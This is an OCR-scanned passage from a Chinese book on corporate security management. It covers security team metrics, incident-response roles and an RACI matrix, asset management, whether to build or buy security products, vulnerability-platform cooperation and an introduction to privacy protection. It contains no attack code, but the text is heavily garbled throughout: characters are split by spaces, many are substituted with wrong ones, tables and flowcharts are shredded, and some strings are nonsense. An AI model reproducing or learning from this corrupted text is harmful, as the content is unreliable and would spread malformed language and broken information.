量化 ， 现 在 所 有 的 量化 都 缺乏 合理 的 立足 点 ， 比 如 检测 到 一 次 准 APT 事 
件 ， 你 束 可 以 说 保护 了 整个 公司 的 资产 。 照 此 下 去 安全 部 门 部 保 护 了 公 
司 成 百 上 千 回 了 ， 老 板 们 应 该 每 年 给 安全 团队 发 个 超级 大 红包 才 行 。 但 
事实 上 是 否 真 的 作用 等 价 于 保护 了 整个 公司 的 资产 很 难 界定 。 有 的 公司 

了 














为 了 避免 大 公司 病 开 始 让 各 个 部 门 目 负 人 盘 亏 ， 独 立 核 算 ， 开 放 能 力 ， 公 
平 竞 价 ， 但 这 种 内 部 报价 和 结算 的 模式 本 质 上 都 有 点 强 买 强 卖 的 味 着 ， 


不 是 真正 意义 上 的 市 场 化 行为 ， 至 少 跟 靠 完 全 的 市 场 化 活动 来 养活 目 己 
的 乙方 安全 公司 比 差 很 远 ， 所 以 这 种 模式 能 激励 提升 内 部 效率 ， 防 止 腐 
败 ， 但 不 能 代表 提高 了 投资 回报 率 。 虽 然 有 一 些 指 标 可 以 衡量 安全 团队 
内 部 的 工作 ， 但 对 于 安全 部 门 整体 来 说 ， 似 乎 难 有 评价 标准 ， 诸 如 一 年 
挡住 了 多 少 次 暴力 破解 ， 挡 住 了 总 量 多少 的 DDoS 攻 击 这 些 数据 用 在 市 
场 宣 传 还 可 以 ， 用 在 KPI 则 完全 没有 意义 。 当 然 如 有 一 些 明显 不 合格 的 
评价 ， 例 如 在 和 管理 层 约 定 的 时 间 内 ， 设 有 组 建 到 足够 文 撑 能 力 的 安全 
团队 ， 没 有 改善 安全 事件 频 发 的 状况 ， 基 本 上 离 下 谍 也 不 远 了 。 











“IT 内 部 过 程 ”这 个 维度 ， 安 全 作为 辅助 的 职能 ， 最 主要 就 是 保障 交 
付 、 运 营 等 流程 的 效率 。 风 险 和 效率 折 中 这 只 是 一 个 理论 上 的 说 法 ， 
际 上 大 家 都 默认 安全 团队 的 作用 是 要 尽 可 能 地 规避 一 切 安全 风险 ， 所 以 
在 风险 承受 这 方面 没有 太 大 受 协 空间 的 前 提 下 ， 主 要 还 是 在 支撑 业务 提 
升 效率 ， 对 应 到 安全 工作 ， 有 几 个 方面 : 





履 盖 率 一 安全 能 力 在 公司 内 的 普及 程度 ， 有 多 少 业务 处 于 保护 
状态 ， 有 多 少 灰 色 地 带 ， 有 多 少 没有 察觉 或 无 人 问津 ， 当 然 还 有 一 个 很 
重要 的 ， 知 道 有 风险 但 是 推 不 动 安全 策略 ， 眼 睁 睁 的 看 着 出 事 。 推 动能 
力 很 考量 软 技 能 ， 另 一 方面 如 果 安 全 团队 人 力 太 少 ， 目 动 化 能 力 太 低 ， 
专业 技能 不 够 高 导致 没有 实力 文 撑 全 产品 线 的 研发 和 运营 ， 这 个 实际 上 
也 属于 安全 团队 自身 要 背负 的 责任 ， 研 发 和 运 维 没 有 在 短期 内 扩容 改善 
系统 的 并 发 能 力 是 他 们 的 责任 ， 同 理 ， 不 能 支撑 公司 所 有 业务 的 安全 活 











动 也 是 安全 团队 的 贡 任 ， 和 争取 到 必要 的 资源 也 是 员 任 之 一 。 


“ 窗 盖 深 展 一 一 对 于 一 个 应 用 系统 ， 上 线 之 前 跑 一 所 扫 描 右 也 叫 履 
着 ， 做 过 代码 审计 也 叫 禾 兰 ， 做 过 威胁 建 模 也 叫 禾 兰 ， 显 然 深度 是 不 一 
样 的 ， 昌 然 在 资源 有 限 的 条 件 下 ， 很 难 做 到 宪 冀 紊 和 和 窗 盖 深度 两 项 全 满 
员 ， 但 是 对 于 部 门 内 部 长 期 的 工作 改进 而 言 ， 窗 盖 深 谋 是 一 个 可 以 持续 
优化 的 方 辐 。 从 源头 解决 安全 问题 其 实 古 非常 有 挑战 的 工作 ， 尤 其 在 战 
线 很 长 的 时 候 ， 绝 不 可 能 有 了 一 个 SDL 这 样 的 方法 论 就 能 解决 问题 。 

















检 出 率 / 主 动 止 损 率 一 一 己 有 安全 机 制 对 攻击 入 侵 行为 的 有 效 检测 
率 〈 漏 报 和 误 报 ) ， 例 如 当前 线 上 的 安全 产品 和 规则 集 对 生产 环境 的 威 
胁 检 出 率 为 80%， 有 209% 古 外 部 报告 或 事后 才 发 现 的 ， 那 么 我 希望 下 一 
年 这 个 指标 能 提升 到 90%， 这 束 需 要 通过 创新 拉 术 手段 ， 优 化 纵深 防御 
体系 ， 清 理 灰 色 地 带 和 和 死角， 逐步 提升 效果 。 





-TCO/ROI 一 一 这 是 一 个 相对 传统 的 指标 ， 比 较 容 易 理解 ， 用 了 多 
少 资源 ， 文 撑 了 多 少 业 务 ， 文 撑 的 深入 程度 ， 达 成 的 效果 的 综合 反映 。 
通常 有 几 个 层次 : 1. 勉 强 支 撑 ，2. 完 全 文 撑 ，3. 支 撑 以 外 能 压榨 出 剩余 
资源 用 于 再 创新 。 勉 强 支 撑 其 实 就 是 救火 队长 的 状态 ， 完 全 文 撑 属于 系 
统 化 但 不 进取 ， 只 有 第 三 种 才能 可 能 达到 业界 最 佳 实践 ， 没 有 富余 力量 
整理 思路 和 搞 研 究 的 安全 团队 永远 会 疲于奔命 。 至 于 能 不 能 转化 为 对 外 
部 服务 部 门 ， 产 生 账 面 盔 利 这 个 目前 看 来 还 是 小 众 话题 。 








技术 维度 指标 一 一 入 侵 感 知 检 出 率 、 入 侵 感 知 误 报 紊 、 入 侵 感 知 
反应 时 长 、 网 络 层 抗 DDOS 能 力 、 安 全 方案 伸缩 性 、 安 全 方案 可 用 性 、 
1day 漏 洞 主动 发 现时 长 、 高 危 漏 洞 全 网 排查 时 长 、 高 危 漏 洞 全 网 修复 时 











“IT 学 习 与 音 新 ”的 维度 是 成 熟 的 安全 团队 才 会 考虑 的 事情 ， 大 意 是 
过 了 救火 阶段 后 ， 安 全 如 何 考 虑 发 展 的 问题 。 有 几 个 方面 : 1) 回 业 界 
领导 厂商 学 习 。2) 应 对 业务 的 成 长 ， 如 果 业 务 侧 的 规划 是 用 户 数 10 
售 ， 系 统 容量 20 倍 ， 完 成 云端 化 改造 ， 安 全 能 合适 应 这 种 变化 。3) 应 
对 外 部 威胁 趋势 的 变化 。 攻 防 是 一 个 动态 过 程 ， 即 使 是 当下 号 称 业 界 最 
佳 实践 的 整体 框架 也 不 可 能 一 劳 永 逸 。 当 学 习 和 能 力 的 培养 过 度 超 前 业 
务 增 速 时 ， 也 会 遇 到 一 个 问题 ， 主 营业 务 决 定安 全 的 天 花 板 ， 此 时 可 能 
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13.4 外 部 评价 指标 
从 外 部 来 评价 一 个 甲 方 的 安全 团队 通常 有 几 个 方面 的 考量 : 


攻防 能 力 一 一 如 果 安 全 团队 没 几 个 慌 攻 防 的 骨干 ， 那 像样 的 安全 
团队 这 件 事 就 无 从 谈 起 ， 对 攻防 的 理解 是 做 安全 的 基础 ， 业 界 普遍 的 状 
况 是 整体 实力 强 的 安全 团队 攻防 能 力 必 然 不 弱 ， 而 攻防 能 力 弱 的 团队 其 
安全 建设 必然 强 不 到 哪里 去 。 一 般 能 养 得 起 一 堆 攻 防 人 才 的 安全 团队 预 
算 都 比较 充足 ， 说 明 公司 相对 重视 。 攻 防 技术 在 安全 建设 中 属于 “ 单 
点 ”技术 ， 决 定 的 是 单 点 的 轨 驭 和 深入 程度 。 


视野 和 方法 论 一 一 单 点 技术 代表 局 部 的 执行 力 ， 但 在 影响 整个 安 
全 团队 的 产 出 因素 上 仍然 受制 于 团队 的 整体 视野 和 所 使 用 的 方法 论 。 甲 
方 的 安全 团队 并 不 是 一 个 纯 安 全 研究 性 质 的 职能 ， 所 以 只 强调 攻防 和 漏 
洞 是 不 足以 产生 高 ROI 的 ， 因 为 安全 建设 中 有 很 大 一 部 分 跟 具 体 的 漏 调 
不 相关 ， 跟 漏洞 缓解 和 免疫 机 制 也 不 相关 。 如 果 只 强调 方法 而 不 强调 攻 
防 惑 会 陷入 纸上谈兵 ， 但 反 过 来 只 强调 攻防 不 强调 方法 就 会 陷入 全 员 救 
火 队 的 状态 。 综 观 业界 ， 过 于 强调 风险 管理 方法 论 的 单位 其 解决 实际 问 
题 的 能 力 往 往 比较 欠缺 ， 而 一 味 强 调 攻 防 排 斥 安 全 标准 的 团队 往往 顶层 


安全 设计 有 问题 。 


工程 化 能 力 一 一 对 于 中 大 型 互联 网 公司 的 安全 建设 ， 能 否 将 单 皮 


的 攻防 知识 转换 为 整个 公司 业务 全 线 防御 、 纵 深 防 御 、 自 动 化 的 能 力 就 
是 工程 化 。 举 个 例子 : 1) 赁 自己 的 经 验 上 感染 的 机 器 查看 进程 ，dump 
文件 解决 的 是 单个 事件 ，2)〉 把 这 种 经 验 转 换 为 文档 和 脚本 能 解决 一 部 
分 自动 化 的 问题 ， 让 更 多 的 工程 师 具备 响应 的 能 力 ，3〉 更 进一步 ， 如 
果 能 将 脚本 转换 为 HIDS 部 署 在 所 有 的 服务 器 上 则 相当 于 全 线 业 务 具备 
了 一 定 的 入 侵 感 知 能 力 ， 单 点 技术 强 往往 代表 1) 到 2) 没有 问题 ， 但 在 
衡量 一 个 企业 或 平台 整体 安全 能 力 的 时 候 ， 看 的 其 实 是 3) ， 很 多 团队 
就 是 在 这 一 步 上 到 不 过 去 ， 进 而 导致 攻防 人 才 很 多 ， 但 在 整体 安全 建设 
上 ROI 不 高 。 





对 业务 的 影响 力 一 一 这 一 后 跟 内 部 的 影响 力 ， 器 组 织 的 沟通 能 
力 ， 推 动能 力 ， 团 队 视 野 有 很 大 的 关系 。 最 明显 的 特征 就 是 安全 团队 是 
在 做 微观 、 狭 义 的 安全 还 是 做 轿 兰 面 较 大 、 广 义 的 安全 。 安 全 做 得 最 好 
的 企业 一 定 是 将 安全 和 风险 意识 根植 于 企业 文化 中 。 











13.5 “最 小 集合 





对 于 创业 型 公司 ， 不 强调 流程 的 公司 文化 中 ， 为 了 保障 全 生命 周期 
的 安全 管理 的 实施 效果 ， 在 流程 层面 必须 要 要 应 对 的 几 个 方面 如 下 : 








1) 建立 事前 的 安全 基线 ， 各 种 安全 编程 规范 、 运 维 配置 规范 等 。 
2) 事 中 的 及 布 & 变 更 坏 市 的 安全 管理 。 


3) 事后 的 救火 机 制 。 





上 面 3 条 比较 容易 理解 ， 但 是 只 有 这 3 条 显然 是 不 够 的 ， 如 果 业 务 在 
发 展 而 安全 永远 停留 在 这 个 治理 水 平 上 惑 不 太 合理 ， 所 以 必须 有 一 些 机 
制 保证 安全 管理 的 水 平 是 与 时 俱 进 的 。 至 少 在 公司 或 安全 团队 内 部 有 一 
个 方法 能 帮助 建立 和 不 断 完善 安全 体系 本 号 。 


A) 把 救火 逐步 转化 为 防御 机 制 或 对 现 有 安全 朱 略 升级 的 流程 (或 
团队 意识 ) 。 


5) 整个 公司 或 至 少 业 务 线 级 别 的 周期 性 风险 评估 ， 主 要 用 于 识别 
新 的 风险 和 潜在 的 可 能 转 为 安全 事件 的 诱因 ， 以 此 审视 目前 的 安全 体系 
中 是 否 缺 少 必要 的 自 检 坏 市 。 











高 清 组 织 中 一 共有 多 少 需要 纳入 安全 管理 范畴 的 资产 是 所 有 安全 工 
作 的 基础 ， 人 否则 补 了 东 墙 发 现 西 增 还 有 个 宣 密 ， 补 了 西 增发 现 北面 没有 








有 时 候 突 然 发 现 一 个 机 器 被 入 侵 了 ， 查 了 一 下 对 口 部 门 说 是 给 第 三 
方 合作 机 构 用 的 ， 所 以 没有 初始 安全 策略 ， 也 没 预 装 安全 Agent， 但 资 

产 分 发 的 时 候 因 为 是 业务 部 门 申 请 的 ， 所 以 跟 这 个 部 门 的 其 他 机 器 在 同 
一 个 内 网 ， 并 没有 做 隔离 ， 使 得 最 终 这 台 处 于 三 不 管 地 带 的 资产 成 了 入 
侵 者 的 跳板 ， 长 驱 直 入 。 这 是 一 个 典型 的 由 于 资产 管理 不 良 导致 的 安全 
事故 。 





资产 管理 的 好 坏 和 直接 反映 运 维 的 管理 能 力 ， 也 很 大 程度 上 会 影响 安 
全 的 工作 ， 如 果 没 有 一 套 好 的 资产 管理 手段 ， 安 全 工作 总 会 处 在 百 密 一 
焉 的 亚 健康 状态 之 中 。 所 以 督促 相关 部 门 进行 有 效 的 资产 管理 并 使 用 目 
动 化 的 手段 发 觉 资 产 的 变更 ， 是 运 维和 安全 部 门 共同 需要 考虑 的 事情 ， 
尤其 在 资源 云 化 的 时 代 ， 资 产 管理 是 最 基础 的 要 求 。 








在 有 了 基础 的 资产 管理 以 后 ， 对 资产 做 分 类 分 级 ， 既 是 信息 安全 的 
需求 ， 也 是 BCM 的 基础 要 求 ， 同 时 隐私 保护 也 有 这 个 需求 。 


13.5.2 发布 和 变更 流程 


安全 管理 中 的 大 部 分 流程 在 任何 一 个 公司 都 不 会 独立 存在 ， 而 是 
把 “安全 措施 ” 艇 入 到 公司 其 他 的 研发 运营 环节 中 。 安 全 除了 上 自 喘 作为 一 
项 业务 对 外 开放 的 部 分 ， 在 对 内 保障 公司 自身 的 安全 问题 上 绝 大 多 数 都 
可 以 当做 价值 链 的 一 个 风险 控制 环 市 。 











对 互联 网 公司 而 言 ， 变 更 发 布 是 价值 链 中 占据 最 大 量 的 工作 之 一 ， 
所 以 在 这 个 环节 上 如 何 “ 卡 位 >， 图 13-4 简 单 做 了 一 个 示例 ， 这 张 图 并 不 
是 正式 的 流程 ， 仅 仅 为 了 说 明 一 下 这 里 抛 出 的 问题 。 


主要 在 “设计 ”和 “交付 ”这 两 个 点 设计 ， 在 理论 篇 中 也 提 到 设计 阶段 
的 参与 是 根据 产品 轻重 程度 决定 的 。 设 计 比 较 好 理解 ， 包 括 架 构 级 的 安 
全 ， 也 包括 诸如 《应 用 安全 开发 标准 》 这 类 事先 约定 的 规范 ， 也 可 以 包 
括 输 入 输出 校 验 这 种 编码 级 别 的 安全 标准 。 交 付 则 夺 括 安全 测试 、 发 布 
前 过 一 轮 扫描 器 ， 以 及 事先 制定 的 应 急 预 案 。 


13.5.3 ”事件 处 理 流程 


事件 处 理 流程 是 救火 阶段 的 必 备 品 ， 决 定 了 是 草草 了 事 的 单纯 救火 
还 是 一 项 PDCA 的 管理 措施 。 下 面 展示 一 个 事件 处 理 流程 的 例子 。 








图 13-4 发布 流程 示意 图 


1. 角 色 和 定义 





重大 安全 运营 事故 响应 流程 中 涉及 的 角色 定义 如 下 : 


D 联系 人 〈 运 维 或 安全 ) : 例如 ,日 天 工作 时 间 联 系 人 为 对 应 故 
隐 系 统 或 安全 事件 的 第 一 负责 人 ， 夜 晚 工作 时 间 可 能 是 监控 系统 的 运 维 
人 人员， 他 负责 与 指挥 人 确认 事件 开始 处 理 、 并 与 客服 务 等 相关 职能 进行 
交互 ; 





2) 执行 者 〈 运 维 /研发 /安全 ) : 在 响应 过 程 中 ， 处 理 故 障 的 技术 
人 员 ; 


3) 指挥 人 (技术 体系 主要 人 负责 人 )〉 : 负责 啊 应 过 程 的 协调 、 决 集 
并 发 令 调度 的 人 员 〈 通 第 约定 第 一 联系 人 为 张 三 ， 如 张 三 电 话 不 可 用 ， 
则 依次 联系 李 四 、 王 五 ) 。 


2 定义 职责 答 阵 





对 应 急 啊 应 过 程 中 涉及 的 角色 职责 定义 如 表 13-3 所 示 。 


表 13-3 ”职责 矩阵 





























客服 职能 联系 人 执行 者 指挥 人 

发 现 事故 R I I I 
回复 报 障 邮件 I R I I 
联系 指挥 人 及 执行 者 R I I 
督导 响应 过 程 I I I R 
排除 故障 过 程 R A 
切换 / 回 滚 R A 
确认 故障 解决 R e 

结束 通知 I I I R 
填写 工 单 & R I 
跟踪 监控 R R R 

回顾 响应 过 程 I R I 
汇报 管理 层 R I 











TE: 缩写 字母 意义 如 下 : 


R=Responsible， 负 贡 执 行 任务 的 角色 ， 有 具体 负责 操控 项 目 、 解 决 问 





A=Accountable， 对 任务 负 全 责 的 角色 ， 只 有 经 其 同意 或 签署 之 
后 ， 项 目 才 能 得 以 进行 。 


C=Consulted， 在 任务 实施 前 或 中 提供 指导 性 意见 的 人 员 。 
I=Informed， 及 时 被 通知 结果 的 人 员 ， 不 必 辐 其 咨询 、 征 求 意 见 。 
3. 流 程 图 


安全 运营 事故 的 啊 应 流程 如 图 13-5 所 示 。 


客户 服务 中 心 
(或 其 他 ) 


当 超过 半 小 时 未 | 同和 报 障 Notes | E 
收 到 确认 Notes 回复 报 障 Notes 督导 啊 应 过 程 


时 ， 应 进行 
半 小 时 轮 循 告警 
联系 指挥 人 与 执行 者 

















如 果 发 生变 更 ， 则 
需 遵守 《生产 系统 
变更 流程 》 





进行 切换 / 回 深 








监控 
充 内 容 ， 当 跟踪 
监控 出 现 异常 回顾 响应 过 程 


跟踪 监控 的 结果 跟踪 
应 作为 工 单 的 补 





了 时， 启动 对 应 的 
流程 








图 13-5 ”重大 安全 运营 事故 响应 流程 图 


在 安全 事件 的 处 理 方 法 上 应 遵循 PDCERF 模 型 以 及 NIST-800 中 所 定 
义 的 应 急 处 理 方法 。 


4. 系 统 关 联 影响 


在 应 急 处 理 时 容易 引发 忙中 错乱 ， 导 致 错 上 加 错 ， 所 以 SOA 服 务 治 
理 、 接 口 间 调用 关系 和 数据 流 杭 理 ， 髓 僚 引 用 关联 影响 反映 了 内 部 治理 
的 水 平 。 对 应 急事 件 处 理 来 说 ， 关 联 影响 分 析 属 于 P 阶 段 的 事前 准备 ， 
周期 的 日 常 工 作 。 表 13-4 是 一 个 简单 的 示例 。 


表 13-4 ”系统 关联 影响 


系统 \ 项 目 SSO 影响 底层 服务 1 底层 服务 2 支付 系统 1 | eee 


a.company.com 








b.company.com 





¢c.company.com 











各 | 和 | 和 | 各 | 和 | im 





























FO | A | AD) AA | Ai 
FD | FAD | Am | PA | a 
FAD | FA | FAD | Fa | am 


事件 处 理 流 程 之 外 其 实 还 有 很 多 流程 ， 在 此 不 一 一 举例 。 


13.6 ”安全 产品 研发 








以 前 甲 方 安全 基本 不 涉及 这 个 话题 ， 在 互联 网 行业 崛起 后 ， 以 
Google 为 首 的 业界 领导 厂商 把 目 己 的 方案 构建 于 目 研 系统 和 开源 软件 之 
上 ， 这 似乎 成 了 行业 的 光 规 则 ， 不 自己 开发 两 个 服务 器 软件 都 不 好 意思 
出 来 说 上 自己 是 有 工程 技术 文化 的 公司 ， 不 目 己 开发 个 数据 库 都 不 好 意思 
说 日 己 是 大 厂 。 大 一 点 厂商 的 安全 团队 也 顺应 了 这 种 趋势 ， 根 据 市 场 上 
乙方 的 安全 产品 。 依 戎 户 画 味 ， 把 原理 摸 清 楚 后 ， 寻 找 相 关 的 开源 软 
件 ， 逐 渐 改 造成 使 用 分 布 式 架 构 的 安全 产品 。 一 开始 可 能 不 如 商业 产品 
好 用 ， 但 省 去 了 大 笔 的 软件 license 和 硬件 盒子 的 费用 ， 经 过 多 年 的 不 断 
改 民 和 实战 ， 慢 慢 就 不 再 把 商业 产品 当成 模仿 对 象 ， 开 始 走 上 了 “业界 
最 佳 实践 ”之 路 。 
































关于 是 否 有 必要 上 自 研 ， 业 界 各 种 说 法 不 一 ， 有 的 乙方 厂商 认为 甲 方 
专注 于 自己 的 业务 就 好 ， 把 基础 的 部 分 交 给 乙方 去 做 。 互 联网 行业 则 认 
为 如 果 google 用 IBM 〈 泛 指 IOE， 小 型 机 + 商业 数据 库 + 存 储 ) 的 解决 方 
案 会 破产 。 从 笔者 的 角度 看 ， 有 几 个 方面 要 考虑 : 








互联 网 公司 即便 是 很 大 的 广 商 也 不 可 能 选择 在 安全 方面 什么 都 目 
己 做 ， 比 如 拨 VPN 需 要 一 个 RSA 的 动态 令 牌 ， 这 种 并 非 主 营 业务 ， 不 面 
加 客户 ， 也 没有 多 少 受众 群体 ， 人 花 点 钱 买 一 下 现成 的 就 行 了 ， 完 全 没 必 


要 自己 做 。 











规模 效应 决定 性 价 比 的 问题 。 打 算 自 研 菜 个 安全 产品 一 定 是 应 用 
场景 覆盖 的 IT 资产 超过 某 个 数量 级 ， 这 样 所 花费 的 人 工 研发 和 维护 的 成 
本 才 会 小 于 同等 数量 级 的 开 资 产 使 用 商业 解决 方案 时 采购 的 总 花费 。 否 
则 一 个 很 小 的 业务 ， 几 百 台 服务 器 ， 花 了 10 人 小 团队 用 于 研发 相关 的 安 
全 产品 就 是 吃力 不 讨好 的 事 ， 研 发 团队 平均 2 万 工资 ， 加 税 和 福利 公司 
年 支出 360 万 还 不 算 管 理 成 本 ， 业 务 调整 或 适 逢 经 济 周期 还 要 考虑 怎么 
调整 甚至 裁员 补偿 。 国 内 超过 10 万 服务 器 规模 的 互联 网 公司 其 实 并 不 
多 ， 人 花 1000 万 买 imperva 的 WAF 不 见得 是 个 错误 的 决定 ， 因 为 上 自己 研发 
要 达到 同等 水 平 可 能 1000 万 也 搞 不 定 。 但 如 采 需 求 是 不 需要 imperva 
WAF 如 此 多 的 功能 ， 只 需要 简单 的 过 滤 ， 那 就 可 以 考虑 用 开源 软件 去 
改良 。 再 比如 IDC 规 模 几 万 台 物 理 服务 器 ， 但 是 web 页 面 不 多 ， 大 多 是 
静态 资源 ， 入 口 集 中 ， 那 就 没 必 要 去 自 研 分 布 式 WAF， 买 台 商 业 的 部 
署 在 业务 前 端 就 行 了 ， 而 不 是 部 署 在 IDC 入 口 。 























对 于 攻防 类 的 安全 产品 比较 容易 获得 通用 的 商业 解决 方案 ， 但 对 
于 风 控 类 的 产品 ， 由 于 跟 业 务 强 相关 ， 儿 乎 鲜 有 现成 的 解决 方案 ， 所 以 
风 控 侧 相 较 而 言 目 研 的 需求 和 必要 性 更 大 一 些 。 


13.7 ARSE 








SRC〔 安 全 应 急 响应 中 心 ) 只 是 一 个 形式 上 的 开端 ， 其 更 大 意义 上 
是 指 安全 工作 不 能 只 坐 在 办 公 室 里 昔 练 内 功 ， 而 是 应 该 走出 去 寻求 与 业 
界 广泛 的 合作 。 以 目前 互联 网 的 安全 态势 ， 没 有 一 家 公司 可 以 独 善 其 
身 。 合 作 有 几 方 面 : 


与 乙方 安全 厂商 合作 ， 共 诗 数 据 和 威胁 情报 。 





:与 其 他 甲 方 公司 或 第 三 方 SRC 合 作 ， 共 享 威胁 情报 。 图 13-6 束 是 国 
内 第 三 方 漏洞 平台 乌云 。 





与 供应 链 上 下 洲 合 作 ， 使 安全 过 程 禾 再 价值 链 的 延伸 段 。 


-参与 业界 交流 ， 避 和 免 闭 门 造 车 。 





当前 位 置 : WooYun >> 首页 乌云 新 增 公共 安 全 合作 机 构 通 告 


最 新 提交 (101) 园 
提交 日 期 漏洞 名 称 评论 /关注 作者 
2015-10-11 位 宝 电脑 内 网 漫游 (100 多 万 员工 信息 以 及 大 量 交 易 信息 ) 5/6 BAR 
2015-10-11 中 国联 通宝 视 通 业务 存在 多 个 参数 存在 SQL 注入 ( FRISEESURARHEUES SORE ) 0/0 BAR 
2015-10-11 ”百度 文学 SQL 注 入 0/8 PyNerd 
2015-10-11 企 智通 系列 上 网 行为 管理 设备 存在 两 处 任意 文件 过 历 & 敏 感 信 息 泄漏 { 都 无 需 登录 ) 0/2 YY-201... 
2015-10-11 中 国 石化 某 分 公司 监测 管理 系统 SQL 注入 漏洞 ( 可 getshell/DBA 权 限 / 泄 露 加 油 站 负责 人 信息 ) 0/2 AR 
2015-10-11 SRAM Roraclezst ( 涉及 300 家 旅行 社 /45 万 机 票 延 误 信息 ) 0/0 BAR 
最 新 确认 (1209) 加 
提交 日 期 漏洞 名 称 评论 /关注 作者 
2015-10-10 教育 部 强 推 超级 应 用 IME 平 台 存在 未 授权 访问 核心 数据 库 漏洞 ( 绕 过 数据 库 访问 边界 ) 13/44 五 道口 .… 
2015-10-11 ”百度 浏览 器 缺陷 可 导致 BDUSS 泄 漏 0/4 隐形 人 .…. 
2015-10-10 ”我 是 如 何 通过 一 张 图 片 shellPP 助 手 重 要 站 点 并 接触 到 核心 数据 库 的 6/43 子 非 海 … 
2015-10-10 。 橘子 浏览 器 远程 代码 执行 11/21 梧桐 十 
2015-10-10 。 百度 人 员 信 息 泄 索 可 导致 内 网 渗透 风险 (聊天 聊 到 优 衣 库 ) 15/47 EY... 
2015-10-01 SEWERS ( 干 万 用 户 信息 泄漏 /变更 游戏 下 载 地 址 /各 种 财务 信息 泄漏 ) 0/4 BAB 








图 13-6 ”国内 的 第 三 方 漏洞 平台 马云 


第 14 间 ”隐私 保护 





隐私 保护 诞生 于 互联 网 时 代 ， 而 移动 互联 网 、 物 联网 发 展 起 来 后 进 
一 步 提升 了 这 方面 的 需求 ， 对 于 业务 规模 比较 大 的 公司 ， 尤 其 是 2C 市 场 
和 全 球 化 的 公司 ， 隐 私 保护 成 了 安全 建设 中 的 必要 选项 。 





隐私 保护 近来 逐渐 兴起 主要 有 几 方 面 的 原因 : 


互联 网 和 移动 互联 网 兴起 ， 大 批 的 厂商 承载 了 上 亿 网 民 的 个 人 数 
据 ， 这 些 个 人 数据 的 泄露 不 仅 影 响 业 务 运 营 ， 影 响 品 牌 ， 加 剧 用 户 流 
失 ， 实 际 上 在 立法 较 成 熟 的 国度 和 区 域 也 触 到 了 法 律 。 当 前 无 论 是 移动 
互联 网 、 物 联网 ， 还 是 互联 网 +， 这 些 只 是 整个 人 类 社会 信息 化 程度 加 
深 的 中 途 片 段 ， 信 息 化 是 全 球 趋势 ， 所 以 从 这 个 层面 讲 ， 个 人 数据 会 越 
来 越 多 ， 承 载 个 人 数据 的 媒介 和 平台 会 越 来 越 多 ， 隐 私 保护 将 会 及 展 成 
为 和 信息 安全 同 级 别 的 热门 领域 ， 对 于 没有 搭 上 互联 网 这 小 的 老牌 安全 
从 业者 可 以 考虑 往 这 个 方 同 转 。 








国家 间 的 对 抗 从 实体 战争 发 展 成 网 络 信 息 战 ， 维 度 不 同 了 ， 目 然 
更 重视 国家 的 数据 ， 从 欧盟 宣布 上 废弃 安全 港 协 议 束 可 见 一 班 ， 美 国 丙 企 
动不动 就 以 法 律 取证 等 各 种 借口 把 欧盟 成 员 国 公 民 的 个 人 数据 找到 美国 
去 ， 各 国 大 佬 们 都 觉得 这 样 太 没 安全 感 了。 大 家 都 知道 数据 这 个 东西 对 
安全 和 情报 的 影响 太 大 了 ， 不 得 不 严肃 对 符 。 





人 个人、 企业、 国家 这 3 个 层次 决定 了 隐私 保护 的 重要 性 ， 对 于 互联 
网 企业 而 言 ， 隐 私 保 护 在 业务 角度 有 如 下 诉求 : 


BEKS, HOE, AP ota) 数据 泄露 ， 数 据 被 供应 商 和 分 包 
商 非 法 倒卖 。 


防止 信息 过 上 度 搜 集 ， 以 及 在 用 户 不 知情 、 无 选择 权 的 情况 下 被 收 
集 和 存储 。 


“有 跨 境 业务 时 ， 需 要 遵从 当地 的 合 规 性 有 要求， 否则 不 能 准 入 。 主 
要 是 按照 当地 的 管理 要 求 在 允许 的 范围 内 以 约定 的 方式 处 理 数 据 ， 壁 如 
由 客户 自己 选择 数据 中 心 的 位 置 ， 合 同 结束 时 删除 数据 ， 在 数据 的 生命 
周期 内 给 客户 提供 查询 、 修 改 、 删 除数 据 的 接口 。 





路 境 数 据 传 输 需要 通过 专门 的 法 律 框架 。 


.有 完整 的 安全 体系 和 技术 措施 保护 数据 。 


设置 专职 的 隐私 保护 职位 《高 管 ) 。 


BE Dy BE EB dig E XT Be RP A EEE 


-提供 审计 的 手段 。 


:法 律 承 诺 ， 违 约 赔偿 和 违约 责任 。 


国内 的 互联 网 公司 在 业务 全 球 化 方面 的 进程 多 数 还 比较 低 ， 有 在 海 
外 开展 业务 的 会 明显 感觉 到 隐私 保护 的 压力 。 图 14-1 是 ACT 29 欧 盟 隐 私 
保护 法 案 ， 内 容 很 多 ， 需 要 学 习 。 





Article 29 Working Party 


The material (opinions, working documents, letters etc.) issued by the Article 29 Working Party (Art. 29 WP), available on this website reflect the views only of the 
Art. 29 WP which has an advisory status and acts independently. They do not reflect the position of the European Commission 


Please note that it is the policy of the Art. 29 WP to publish on its website the correspondence it receives, as well as its response fo such correspondence. Should 
you not wish that your correspondence, or the response of the Art. 29 WP, be published, in full or in part, either for reasons of business confidentiality, protection of 
personal data or other legitimate reason, please indicate in advance such reason/s, as well as the parts of the correspondence to which this applies 


The Article 29 Data Protection Working Party was set up under the Directive 95/46/EC of the European 
Parliament and of the Council of 24 October 1995 on the protection of individuals with regard to the processing 
of personal data and on the free movement of such data. 


It has advisory status and acts independently 


Composition & Structure 


"The Article 29 Data Protection Working Party is composed of: 
* a representative of the supervisory authority (ies) designated by each EU country; 
e a representative of the authority (ies) established for the EU institutions and bodies; 


* a representative of the European Commission. 





图 14-1 ACT 29 欧 盟 隐 私 保护 法 案 


隐私 保护 总 体 上 讲 并 不 是 一 个 偏 技 术 话 题 ， 不 过 下 面 只 打算 介绍 一 
些 跟 隐私 保护 相关 的 技术 。 对 于 企业 在 全 球 化 过 程 中 ， 隐 私 保护 应 该 如 
何 建立 体系 ， 笔 者 会 在 技术 博客 中 做 专题 剖析 。 


14.1 数据 分 类 


隐私 保护 强调 的 是 个 人 数据 PII (Personally Identifiable 
Information) ， 这 与 纯粹 的 服务 器 数据 保护 仍 有 差别 。 





在 安全 管理 中 强调 的 是 区 别 业 务 和 资产 权重 以 投入 不 同 的 成 本 做 风 
分 控制 ，BCM 强 调 的 是 基于 不 同业 务 的 RTO 和 RPO 做 持续 性 管理 和 业务 
恢复 策略 ， 隐 私 保护 对 数据 分 类 的 要 求 更 细 ， 以 便 对 数据 的 全 生命 周期 
提供 不 同 的 保护 、 访 问 控制 和 加 密 策略 。 


以 手机 的 云端 存储 为 例 ， 云 并 备份 数据 属于 非 结 构 化 数据 ， 其 中 通 
讯 录 、 生 办 事项 等 属于 结构 化 数据 ， 它 们 的 保密 需求 相同 ， 但 是 技术 实 
现 手 段 可 能 就 不 一 样 。 


